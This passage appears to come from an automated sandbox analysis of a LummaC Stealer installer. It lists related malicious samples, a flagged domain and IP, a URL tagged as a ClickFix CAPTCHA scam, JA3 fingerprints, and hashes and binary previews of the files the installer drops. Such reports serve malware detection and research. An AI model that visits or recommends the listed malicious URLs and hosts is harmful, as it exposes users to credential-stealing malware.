	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	setup.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.34.147
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.139.144
	PDF-523.msi	Get hash	malicious	AteraAgent	Browse	104.18.18.106
	E6wUHnV51P.exe	Get hash	malicious	DCRat	Browse	104.21.12.142
	gem2.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	172.67.160.193
	https://accountsupporthub.es/generate/Login/	Get hash	malicious	Unknown	Browse	104.21.90.106
	Solara.exe	Get hash	malicious	Python Stealer, Exela Stealer, Xmrig	Browse	162.159.134.233
	resembleC2.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.135.232
NTLGB	res.x86.elf	Get hash	malicious	Unknown	Browse	86.33.7.202
	5.elf	Get hash	malicious	Unknown	Browse	82.30.244.131
	6.elf	Get hash	malicious	Unknown	Browse	86.6.255.118
	4.elf	Get hash	malicious	Unknown	Browse	92.237.232.117
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	212.250.45.83

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	x.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	176.113.115.170_3.ps1	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	5tmmrpv3dn.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 185.161.251.21
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.16.1 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\224553\Luther.com	c.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\224553\Luther.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Full-Ver_Setup.exe, Detection: malicious, Browse Filename: random.exe, Detection: malicious, Browse Filename: HouseholdsClicking.exe, Detection: malicious, Browse Filename: DodSussex.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\224553\z

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	485854
Entropy (8bit):	7.999573394829961
Encrypted:	true
SSDEEP:	12288:SIue0YbJwVAHBqUzXzA767Tzv9SMFHUUHPyhbRCL:SIx0gCAhqozC67TzFSQFvyhM
MD5:	33F702C6F174718D817B4605ED89B52F
SHA1:	F5649E94BFA880C7AA8D2EBCC27CBBCF44901223
SHA-256:	1021AFDCAC174AC0BFEB373B28C4658B5DC7671FCD2F7301EDB10746EAF4F333
SHA-512:	D6DABDACB753C46BB6D9043DF7F02676F8EC5221742B5E861E62436BECE904F92214498C5E3EECB0974CB47229A7356101C936B0ACC26EDC907D150EFB01D1E5
Malicious:	false
Preview:	.Q...2.^.t...............g.6...N.h..,.{....[....X.......8P}K...T.S....+..B(\|.B....4.\|..h..E...5.....k....@^...._......n......kpeG.....@]9../..[....U..#..W'./...X\|r.Y...:7........_...N.5ro$.6q.g\|.B.R..\|X...Q!f%%of...RP.S4....\|.m);G.7CkTs.s#.P.......h9...z)ia]]:...r7".M.^.o...H.q....U.8.B......Y.!;..6x...U..fU.o.;6(...Ypb....n....].j/.'AI.2..'P.#..h....;.M.!..c..a-.>.F.V&......f0Y.........&Z1...#..R.;g2G.t..x.Q.fFf...S...9....b.{...q...B....'..a..b...lg......"......!jO...~0t .r.+....$+y%..f8.^3$......w.....7..i.Z. ......S...8..O:..F.'>.zwA..9..i-[.)....Cwt.........}.f.....M...&L..b..b...x....x.Z.1Ipl.....)i...Wo.&.Y..{......4m.D....jE..@.r.E>..g&.?.U....a....\|....b..\|{..D.B.I....Z.x.......a.......uR........o.$F.d.B.s...%_..V..Z4(.......q...,f..P..=M.uBK.V.H....B."I.t).nDTa....P..C..f.............`W..]0..D^.>..:....at2...I)...9.v<p/.\5...]..&y.....e-.{.....Qh.<)E.o..f..[.g..9...[[...R.N7.a..L.4&v.\W@..Ce;2...5sy..6..p.8..ff.........t`.N.u

C:\Users\user\AppData\Local\Temp\Architect

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	7.996051998557532
Encrypted:	true
SSDEEP:	768:CiLf0dEns7XSCAOROOzsycJSpAysuRQMDBgY+v8tj3nk1gGM1KyJMIwFKzx9kKcw:BLIExCPOOYyaSpr+aNZnke3J/zxel7G
MD5:	AF3FF719C0EDACF7C2AC90C6259B85C4
SHA1:	3DF4EFC47089E1DCC211BF19459C228FC36ABF74
SHA-256:	97AE833CC88A6444656556032AD9D2EC0351233B41C5EC74A2D49341EEFFA1B6
SHA-512:	2368493619E85C862997179945CECFCB4F824BA85B5B7E3B7278B6974EDACFE9A95960BAB8F436EA6E380965B3EE1BE6C6FC3B274B42BED7200726FCF5D593D8
Malicious:	false
Preview:	.J].?.....p0I.:..[C....T.......`...r...".....w.).-\U:....8n.`...edN..HG.... ..YY....a.@o...u. ...wErW.L.U...h..}...2...9c..sB.m..m..9.....vn....%.@,pc.Ch...7.tgC5e........HP.x.r(.l....g......?......#.Y!.A'}......,...8...2y..U.8..<.S)O.;...h.W.x]^...9.....1T....4Ijc..pc..f..^A.p.C.(......8.^A......t.$1...f...&.....XF..,..".._.\....d.Y?.y..w3..z....A..... .......&DVa.6.h..rv^..!A....u..../..fo.\..C....0....[..._u..Z..Y...9&yP...I.Ij.o.<,'6;%..sP......C.!.oCt.....huW4x.P>...`N.Xv.....9/....)w.~.Y_h.d.B!.8je..\V..t!...6.0Ue..ZZ..J%qF..n.7FI.{..Qp.3........M?{.VFbG........T..{e....'.VS$.N...{..r...T....l.BA...VQ.1.Q]Y..r..5.3.O.@.ftT..!.R...$b..O~....mr...@A@=..z......8db\|.p).yt..+.E:\|.2v>(.."..c...\p..J.4..vN......O.Cn...t.....9..O1\|.....r!....B\...Q.%oY.\4..nF..U.:..s.z~......U.a .../.F.+.+..k7.,.t.%y.U!.e...e.......A.T.I.ibq.,....#...^......D....S.yi.>...qy...J;.^s...b<;.7.#..1;..Z..YA.....$UD..}..'.....E.\|.j4.....&o.i...u&.p..'....0$

C:\Users\user\AppData\Local\Temp\Cho

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.68731712000028
Encrypted:	false
SSDEEP:	1536:EIwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyIi:GcBiqXvpgF4qv+32eOyKODOSpQSAB
MD5:	5FA589CA1812F594C0773AEA5ADAA1AF
SHA1:	D7E9B77324D0DA50B2D3B253FE57ADA8100E2DD9
SHA-256:	43F6FA8CD5131CDB725AE40BC9643A0126C9FF356333D757E6AB105E1274CFB2
SHA-512:	490A3DAB1F7A50E7DA3DCEA5BB39AF7CED6326CAEE9D332F12B4F0DED6A235E612C53AB3FA2A7695C83630C5F8252A3E86140F3C6DEDDDB7912E228DABC9735D
Malicious:	false
Preview:	........t...uE.E......<.......}...xt...Xt...u..E.....P.M..v....}.....u..U...7....}....3..u...j0Xf;...U...j:Xf;.s.....0.=........f;........`...f;...&......f;.s....-`.............f;..........f;.s....-..........f...f;..........f;.s....-f.............f;..........f;.s....-.........f...f;..........f;.s....-f............f;...w......f;.s....-.....]....f...f;...T......f;.s....-f....:....f...f;...1......f;.s....-f.............f;..........f;.s....-..........f...f;..........f;.s....-f.........P...f;..........f;.s....-P............f;..........f;.s....-......... ...f;..........f;.s....- ....k.@...f;.rf...f;.s....-@....O.....f;.rJ...f;.s....-.....3.....f;.r....f;.s&...-...........f;.s....-............u0jAXf;.w.jZXf;.v..F.f;E.w..F.f;E....w... ...........t1;E.s,.u....;.r.u.;.v........u....u...7....}..9...V.M........u..E.3.E..A.u.VS....YY..t(......."......u.........t..................t....}..^..e....E.P.....V.....U...8.M.SVW.6.....t#.].j._..t6;.\|...$~-.............3.....u...t..M......_

C:\Users\user\AppData\Local\Temp\Choosing

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	Microsoft Cabinet archive data, 488637 bytes, 10 files, at 0x2c +A "Departure" +A "Webshots", ID 7136, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488637
Entropy (8bit):	7.998553093427413
Encrypted:	true
SSDEEP:	12288:ahh/9BtROsl7lHOMO5nQZ162gpIjfscznOJhXZg/Klkw:MhXtnl7luC62gKjk+YU/Kl5
MD5:	72C5F20B52AECA0923566A34B9133CF2
SHA1:	7832A2B158078E5BF463F54E54D6538FB340B6F0
SHA-256:	87AA8213C3409DE46457A2FDBB278FF529CAAC10391F36687617FA149406B5EA
SHA-512:	2F0F8231C1A90D91DB5701EBC57941B673F036B859607B22815E372613A348E1C3EA46EC10F785F77F091612C987DD3A6CB7BA6F2B922C640CB4D099D1510455
Malicious:	false
Preview:	MSCF.....t......,.....................................,Z.I .Departure.o ........,Z.I .Webshots..@.._$....,Z.I .Remote....._d....,Z.I .Holocaust....._t....,Z.I .Rating..`.._.....,Z.I .Cho..8.._.....,Z.I .Page....._$....,Z.I .Priorities....._0....,Z.I .Reliability..L.._(....,Z.I .Dot.wd..\I..CK..\.Y.... AP.D.....JV@P.P.@..%IF. A.$...d..!.....H.$.9.(.........{.{.......:.._Ug~}M_....#1......l..h.(.>.$.?.Pc...c...C.x..C.....&Kk.Ck]3......6Lz.L..L..LR.JLf...9....}.#.&Mx6.i...y...R>#...w.5......5W.W.o.?.U.`:6 i4..*....UaT..4...d\...U.s{..^=...F.{.+.._3.....)J.....@..V..A..q... .G..e.{.&.1.. x.B.y.k.......k.d.....).X.....%{...D.3TT..0...<......$.... ...t..M.$.@...>.n.A>...\|N9m..l..$..3CP_......:..tmt...6...i..w..v%8?g..,....@.....\|HN.;.7...}.........7..3B}...p............O..m.R.L...e.5(..7..+...o.......~....<du-.Qv..D..BX;..;."....ns....[..\5..<..M...N$O..6o.m. ..G.\|e.......k..4.^..y....a......>y[.,...+..o.'O.H....j%).,.l..w.{G..$3`...&\|x..'N...v.\|......

C:\Users\user\AppData\Local\Temp\Crowd

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.9978628045379745
Encrypted:	true
SSDEEP:	1536:oRHUXB8kuuEMOjWUqTAlyY9ILFz8/7YAuPQOiN/gi1aowi+QB9RCIcl55G0I7TsA:oRIuuBOjWUIAMGIxojYBPsoQ3b03Gb39
MD5:	E6391427848508DC0AC92258CC6FD6AF
SHA1:	6722E7BCF38C1C2013499F725850ABCBCDC06007
SHA-256:	65E9E6BFCCD8AB7ACAC8E56E74410059512477C47DFF1ACBCABA22F3611EBD06
SHA-512:	0FF1ED8D2F55169991C20F9884E97D73D91B24639C0E1813D4F2C5C1231904F5D829A567A2BC88A869FB9F544B16844F439947CBAD5573B28E3E30662CC93260
Malicious:	false
Preview:	.Q...2.^.t...............g.6...N.h..,.{....[....X.......8P}K...T.S....+..B(\|.B....4.\|..h..E...5.....k....@^...._......n......kpeG.....@]9../..[....U..#..W'./...X\|r.Y...:7........_...N.5ro$.6q.g\|.B.R..\|X...Q!f%%of...RP.S4....\|.m);G.7CkTs.s#.P.......h9...z)ia]]:...r7".M.^.o...H.q....U.8.B......Y.!;..6x...U..fU.o.;6(...Ypb....n....].j/.'AI.2..'P.#..h....;.M.!..c..a-.>.F.V&......f0Y.........&Z1...#..R.;g2G.t..x.Q.fFf...S...9....b.{...q...B....'..a..b...lg......"......!jO...~0t .r.+....$+y%..f8.^3$......w.....7..i.Z. ......S...8..O:..F.'>.zwA..9..i-[.)....Cwt.........}.f.....M...&L..b..b...x....x.Z.1Ipl.....)i...Wo.&.Y..{......4m.D....jE..@.r.E>..g&.?.U....a....\|....b..\|{..D.B.I....Z.x.......a.......uR........o.$F.d.B.s...%_..V..Z4(.......q...,f..P..=M.uBK.V.H....B."I.t).nDTa....P..C..f.............`W..]0..D^.>..:....at2...I)...9.v<p/.\5...]..&y.....e-.{.....Qh.<)E.o..f..[.g..9...[[...R.N7.a..L.4&v.\W@..Ce;2...5sy..6..p.8..ff.........t`.N.u

C:\Users\user\AppData\Local\Temp\Departure

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1008
Entropy (8bit):	3.2336484110690926
Encrypted:	false
SSDEEP:	12:YyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:YyGS9PvCA433C+sCNC1
MD5:	F5189566C9C39E1C2D0D72E8C10B8B79
SHA1:	C59598A96AA3B5939D663FD80FBD591EE3291929
SHA-256:	1ABE59BF2ECCF033889F006F7E47709EC38D5E36E795DC959E68AD60A1C1425A
SHA-512:	353580A4B7D04D7FC6AAF5DF3CB9D84AAF39264E371263F1FAC6E1680A863BC42757658171C36FD84E19EB555F2EAFF1596511E0AF1DC62D1DE7358FC793BEFB
Malicious:	false
Preview:	Readily........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Dot

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	6.575192846373192
Encrypted:	false
SSDEEP:	1536:l+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bL5:cAqVnBypIbv18mLthfhnueoMmOqDoiok
MD5:	BC5A5C27BBDA4F3EE9D4DF841EE733B1
SHA1:	F5B47462614D2BA38709DC5E59860B2DFFB4535A
SHA-256:	F232B85DBCFA04E0BF3881A1693F6D5A79031CDE17C56CB819C94B844D61E8B9
SHA-512:	AD399CAB38073200FA32B809EB25D7BF7576FFC23275ADE88F4B72DCA544F87E72EF02F24E608F51263154386E38C6CE48DE9693332A61E02A030B8D7E667AAD
Malicious:	false
Preview:	..t.P....I.2.....S.u.h.....w`P....I.....u#.F.......0.I..F.........tVP....I..M.E.PW....I..U.3.....N..V.8].t...W8^0t..................^.........t.P....I.....t.W....I..._[^]...U...$SV..3.WS.FT%....PSS.v .v.....I.....u..F.)........u...W.l...SSSSW....I...twW....=....uj.E..].P.E..E. ...P.E.Pj.W....I.3.f.E..E.P.G...Y.F..V.8].t...W8^0t.."......E......9.^.........t.P....I....!.F.*.....0.I..F.........t.P....I...t.W....I._^..[....U..U...D.....3.]...U...\|SV..M.W.....E.P.v .q.....u..F......;.}.j.[;.t....t..F......#W...n.....u..^......tHO...t%.F.......0.I..F.........t.P....I.2..=.u..FXP..........P.E.P.r......u.......P..........P.E.P.......M....._^..[....U.....e...E..e..P.E..E.....P.E.Ph... .u.....I...t..E..........U...$SVW.}....t..FT.E.u.......E...Gx3.SS.wp.w0.w P.w..v.....I.....u(.F.......0.I..F.........t.P....I.2......S.u.SSS.w`SP....I.....u..F..........8].t..u...W......E.....t..E..E.....P.E.Pj.W....I..M......E.j.Pj.W....I.SSSSW....I...twW.....=....uj.E..].P.E..E. ...P.E.Pj.W....I.3.

C:\Users\user\AppData\Local\Temp\Holocaust

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	6.216478847515094
Encrypted:	false
SSDEEP:	3072:EzW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtr:EzWWt/Dd314V14ZgP0JaAOz04phdV
MD5:	7EBB69FB1E465B4D1C8E467AB5E583E0
SHA1:	27DED234EC9E48F32738F6DCC15E2A34FB34455E
SHA-256:	82653165CC91BC33C0120101DC443294CBCDCDF02D19111EF906E5F00EFAD565
SHA-512:	C85781A91B3CD7EF626350BF50618043896FCEC372624CCB900E9500B56DCD80DEABD6A3A8B81BAD558AB7CE5E3C87FD51F790893A63CD20CA8B153299B899A6
Malicious:	false
Preview:	.t..G..p.....v..S.\|....u........F.........t$...u)...H..D1.8\1.t..@8.@......D1.8\1.t..@8.X..L$@.R....L$ .A....L$0.8..._^3.[..]...U..U.V........J.....,....teR.......j....7......By*...Q..\|2...L2.t..I8..A..\|2...D2.t..@8.@...u.........&..F.....................3.^]...U......DS.].V...D$...I.3.C.AW.D$.3..L$<...L$,.L$0h.L..D$4.D$<.D$..D$..D$ .D$$.D$,.R...M.h..I..R..h..I..L$$.R...C..L$..0.`...\|$...L$.r..C..p....D$ P.l`...D$0P.L$..^`...D$...P.k.....u....H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...w.\|$..u..C..H.....x..L$@.u..........D$@PW.I.....t..M..D$@P..`...,...H..\|1...D1.t..@8.@......\|1...D1.t..@8.@...L$@.A....L$ .@....L$..D$...I...^...t$......Y.L$0....._^3.[..]...U.........S.].3.VW...D$(.s..t$ .D$,.D$$.D$..D$0.D$....r'.C.j).H..L$H......u...s...L$D.A....D$(...r..C.j).H......u.....D$,...rV.K.j).I......uE.c....K..D$..I..T....K.....D$$.I..B....K......D$..I../......%.....D$0.\|$...D$X0....D$\....t..D$\.....C..d$`..d$x..d$d..0....s...F....D$\|3..D$t.D$p.D$l.D$h.D$.P....I..D$...D

C:\Users\user\AppData\Local\Temp\Leone

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996386526816881
Encrypted:	true
SSDEEP:	1536:pMEoZw1DXfiMSvw4q1g6Sra+oUuiw1//uoKXQyQw:pMw1DKMuq1LU8KXL
MD5:	4CFE724FA55D354C9807368C7D6EEF37
SHA1:	6B7B271980FDA4C942290A4E58625A4173C2719D
SHA-256:	CB198967C45747C5E6A2FD5C92FF5B13E4C10D4F7DC443B394601C8DB65B8B71
SHA-512:	71DAF1FB12364CC73D73B44EF5B63D7AC749FD2EACC36C53D3F47A4E7BCFCCEACB50D85DB14E67FBA403E97F922BC43F03E1817C4FCA00F945CF36C667F19892
Malicious:	false
Preview:	6.m..z'...#..>...d>@b...U)...C. ....U.....5,..s...a....O..+..h.C..a(.....C..b......o._.#.....$....o..u..~..g..A..._9....v:..d.f...v..".4H.v.,i..(j.(H.g.3CPA....{r5n).Qoj..Y.....89..t!....v2.n=../...k.x.....KyG..>~...{..f.ol..6 .%q...P......5....q.^......J..."1..Ag3r@.y.h...r.O..7YY.x......p"...............h..Gm.P..W.s!.{\|....Z.\|.\....IL....O....Jgg.J.a).p..T...z..\........D..n3....W...U8..@.q8.2...D.V.-`..%Zr.......EM....G...XK'.I....@.8.]KN....q..I.1..e'./s.QF..LMBo@.....+D.y.!.H....')6.....pG.lud.......IM..%.%.@=e.:..M...{OJ.N1.Z$\|.zvZi.8....y.}~.>:. N.S.}......H..h.7G.q......P........\..[S......e.]_!p....M.s..y.NX.O....lZ4..c.&}./VM...}QG.B.c.]\|..U...+.......MIR.9#.o-.Q.........d@Df.r.xQ..m/.......eZ..-....wh.>.B..bC.-J.}....K...X.q.bmg.L."...\|...,yP..or...A...\|.y..r..._Qw.mQ*.^...7.p...:...p ,....M.p.%.......ijGRO....;...kH..j..!M!......].E...E..^..t.l....,,..M.9.....X..[...".B?.5..K_...@.;...V.V...7+.M.'.y.=..7...j.>C.h.q6..UIm.Y....B.!

C:\Users\user\AppData\Local\Temp\Many

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	data
Category:	dropped
Size (bytes):	41438
Entropy (8bit):	7.995770146359073
Encrypted:	true
SSDEEP:	768:Cn0UkXryJTmBLd5PyA7WxKGl0vV6Uat9ZvF5HBQ1e9rNr/Z27MPUbjDG6y70ESH5:EqXryJTmBp5PBLvlabn1BQENu7Mcbdye
MD5:	3510BF64CFA6DF3631D880DB920B568F
SHA1:	397BB3156970D85919C7EEA0559FCF55C4F42046
SHA-256:	D6B86D8D46D73F3DF05A804615985008646DD078ECC4BB753B34C0026CAB4473
SHA-512:	EB2826FC3036CF81B2517389BAFC6960700A8C5AA5D0F6F6532E20CA983D3B621F96B479DD5EF6FE12FC78B895E2F862A2704F1514D88913C70D6A483F7A6B55
Malicious:	false
Preview:	(:x......$%..gKN.........y.1........k.=......k...A..g.-...:....~k.......x.f...._.l..{.%...aK]..z{...~.8.X....!.O6&...70.(.}Ps..i.O..{..H^f.....I..{...f7..f...( ...u...&=.,q.}.J!Zu/ffrF.}.'.{z.Z.Dz..5........06BZU.]..-....#Q..3K./."...7_.".........g..7.._.B..W_.KO ..L..;...Y..Z]..\|qz......`...K...L....;..>\s..J.d^.....p...7...{-.VEr....)Wv..l7.8W4........u..0Q.....:W}....N..#7.....H^..WtvT..^...0.Q3..k.".....Z.`.S.d..QE1.6...c.M%2.(..,VsWN..+.a. p;.Xp.K..B.?Z..2...p..$%.....L9...>h.G>.6..IQ.G.oy9..............^I.:...d&.z../..54.......y...`.U..c............M..z..Q+.p...4..+....r\:..aV..:7/.\.(Np.\r..O..@6a..x.........]..-X...z ...ScF\|...M.^......9)..q..+..1._}....s..i...HH...+0...u..a..BBD+.Rc8.~..._^H.H].f.AE....L.D......:...]k.-.....h.{...O..5.Z.I.F5SF.....&b,....R/M..W.-Ly.'.x.)..&..CtnL...]....h.B.H....L.0w>&&...J.-{F...F...e1R'Y...p...R...2.6..?..C....C.A.]....=h.x..B....d' ......."..*..Ho...}......Xx..._=/\e....wz.Eu.6.Lg..N...8).=...W>=.g

C:\Users\user\AppData\Local\Temp\Margin

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997656375487335
Encrypted:	true
SSDEEP:	1536:wyZwGpggpUA1kDahFLd1RfTv1gVf7mah0WDyYitGdhBV9q0nqMoZ/p:wybpSsrd1NTv1kC8ZDyLAd/zqMc
MD5:	EDAD8BA829CE461DF73B1C45419D06F7
SHA1:	E5B34951D4BB4AD311413B0CF6075D6C70AE1D61
SHA-256:	2E5FFE7355A711DED6E0A037F2FD1EEC67DD52D48A83117E7C35827C2C7AF2C0
SHA-512:	1D9F069336F56434C9343F1A54D0391F5D8B273AC22A0C5713FF8645A8A828EB5B56B3D0B1A10DA9F1E394527B421DF31171691C57FC893F5649CFE5FF040E35
Malicious:	false
Preview:	...eCS..(..5...\...-R..KS.N..SF5:.{..YC....c......k...D.)x...L.h.W...&.+g.q.&u..c6R.gQ.:V$.......2..s...c....+\|.uG.i.WS..E9aO:......+....9.sN...........o..`1.N;....1...d//Q.....>C.....[.....d<pK.G........p.K.O...l..]....T..]. ....^..'n..#.%E..F..F.Bu.;Z{d.Vi.{.H.......T...I.m.....{C...`.5=.......#....V.87r.~....Wp...."...m..a...t..V`u.f...u0.m..8........h......\..h...CY .....+.[q)=.\.X%..T..z.../.m.........`..1{..S.A...e..EX6}\|.7E.......aX....]..4s.U..U(.Q.4.b/.1..r...?..$...R"8....qa...Nk.U)......._#;....Sv\.)EQF.}u..n....B.kz..h.M.(4...b.K...?.9^...fU.....tDS. .'....v.......t.K.g..wX...^.1.._...m...d..../wX.'...'.....H.&.V..]B<.d.y.Z...-Q....2..s..5f.......8.\|.......c"..).....K~..(R.. .tZ......V...`r.....c2n..H..gu.....w".>T.e&..7E...\|\.wC....3....0....z..]......rI.f...!....3.]#...u.......E.5.]..P....P..lY..r.O..ph.g..d.NzQ3OG....O.y.....-Sk.tA?......%.v..!..&kj.~."..@l... .`..".h.0.y..nTl..T.I.\|S......'L...J..'..y.d..Sl.O....R#

C:\Users\user\AppData\Local\Temp\Mutual

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	data
Category:	dropped
Size (bytes):	92160
Entropy (8bit):	7.998241493819848
Encrypted:	true
SSDEEP:	1536:nJdfp3DbiNyVXvGbm/OYeudJb4rQnTUP30quGsH/DUy6SmwXIk39lRyHmL:JDfvGbmxjdJ7TUPBsfD0w4kjRyO
MD5:	D6BDAAE9E013495C5FB5E97F1203009A
SHA1:	E4603F73D1289C0DA115E8D7F95D7C78CACA232E
SHA-256:	CEEAA6AD552BA0189F32C51153C882A9772E6FC3D7D1D9A632106348840FABDE
SHA-512:	CE5E9A2F6E63ABC12D32D2CC88203B73C2B968D485701749EA8FA9C762794AB7059F396DAA3E78AA2B238D1FECCC0BE929198CBFF79A46EBC17F71405C066BB2
Malicious:	false
